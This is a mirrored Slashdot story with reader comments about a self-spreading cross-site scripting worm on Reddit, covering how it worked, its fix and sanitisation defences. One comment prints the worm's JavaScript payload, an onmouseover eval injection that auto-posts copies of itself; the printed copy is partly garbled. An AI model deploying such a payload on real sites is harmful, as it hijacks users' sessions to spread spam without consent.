Slashdot Mirror

← Back to Stories (view on slashdot.org)

Reddit Javascript Exploit Spreading Virally

Posted by CmdrTaco on from the hate-when-that-happens dept.

Nithendil writes "guyhersh from reddit.com describes the situation (warning: title NSFW): Based on what I've seen today, here's what went down. Reddit user Empirical wrote javascript code where if you copied and pasted it into the address bar, you would instantly spam that comment by replying to all the comments on the page and submitting it. Later xssfinder posted a proof of concept where if you hovered over a link, it would automatically run a Javascript. He then got the brilliant idea to combine the two scripts together, tested it and it spread from there."

12 of 239 comments (clear)

  1. Re:proof of concept by immortalpob · · Score: 4, Informative

    This is a flaw in Reddit's comment system, that allows the poster to get javascript code executed. A comment system should not allow you to use "onhover" that is the point.

  2. Re:Is this good news or bad? by corbettw · · Score: 2, Informative

    Slashdot doesn't require Javascript. If it's turned off, you get sent to the classic POST form of yesteryear.

    --
    God invented whiskey so the Irish would not rule the world.
  3. Already fixed. by complete+loony · · Score: 2, Informative

    KeyserSosa Thanks for this (and thanks aedes ). I'm going to steal his idea and post here as well. We've fixed a couple of underlying bugs in markdown.py, and will write a blog post for those interested once the dust settles. We've also gone through and deleted the offending comments. This exploit was a good old-fashioned worm, and its only purpose seems to have been to spread (and spread it did). The effect was limited to the site, and no user information was compromised.

    So obviously this is no longer spreading.

    --
    09F91102 no, 455FE104 nope, F190A1E8 uh-uh, 7A5F8A09 that's not it, C87294CE no. Ah! 452F6E403CDF10714E41DFAA257D313F.
  4. Re:NoScript by maxume · · Score: 1, Informative

    You seem to have misunderstood what is going on. There isn't really a 'viral problem' in the browser, there is (was) a comment that would cause your browser to spam the server with copies of itself. So the problem is described as viral because it spreads to new users as they hover over an infected comment, but the problem is pretty well localized to reddit.com, and browser security is in no way compromised.

    --
    Nerd rage is the funniest rage.
  5. ironic javascript fail by Anonymous Coward · · Score: 1, Informative

    Incidentally, I went to mod this and it failed... multiple times.

    Though it eventually worked, I am not impressed.

    It seems that Slashdot is so horribly broken and inconsistent as to be immune to such exploits.

  6. Re:Well, that site has a terrible design by aoni782 · · Score: 4, Informative
    The script:

    z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('tez="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('textarea');for(i=0;i<e.length;i++)e[i].value=z;e=o.getElementsByTagName('button');for(i=0;i<e.length;i++)if (e[i].innerHTML=='save'&&e[i].style.display!='none')$(e[i]).click();"

  7. Mod parent down by bluej100 · · Score: 3, Informative

    The correct solution is a whitelisted HTML parser and generator, like HTML Purifier.

    1. Re:Mod parent down by bluej100 · · Score: 2, Informative

      You're incorrect. HTML Purifier builds a tree of the HTML it understands and allows, then outputs a clean version of that tree. If it doesn't recognize the markup, it doesn't pass it on to the browser. I'll give $20 to the first person to show me an XSS exploit in the current version of HTML Purifier that isn't the result of an overly permissive whitelist. (Disclaimer: I use HTML Purifier and submitted the patch for CSS.AllowedProperties, but am in no other way associated with the project.)

  8. Re:Is this good news or bad? by blowdart · · Score: 3, Informative

    No it's not. The Reddit hack was a Cross Site Scripting attack made possible by bugs in their markdown implementation which let javascript through the parser. It was not a SQL injection attack, it did not attack the database directly, no commands were ran to directly put data into the database. It's an entirely different vector and an entirely different vulnerability, all the stored procedures, escaping of apostrophes and parametrised SQL in the world would not have stopped this.

  9. Re:Is this good news or bad? by prockcore · · Score: 2, Informative

    Section 501 only applies to government websites, and really, it should apply to crappy screen readers that can't handle javascript.

  10. Re:Is this good news or bad? by Serious+Callers+Only · · Score: 3, Informative

    Filtering user input properly would have stopped this though. It is not an attack which relies on a flaw specific to javascript - the flaw is a very general one - using untrusted user input without aggressive filtering.

  11. Re:Is this good news or bad? by FatMacDaddy · · Score: 2, Informative

    I think you're talking about Section 508 of the American with Disabilities Act. And yes, it can apply to more than US Government web sites. Target found that out the hard way after refusing to provide alt tags and other accessible changes to their web site. After getting slammed with a $6 million judgement, no one else is bothering to refute what has become established case law.

    I might also add that Section 508 covers much more than screen readers and javascript.

    --
    This space intentionally left blank.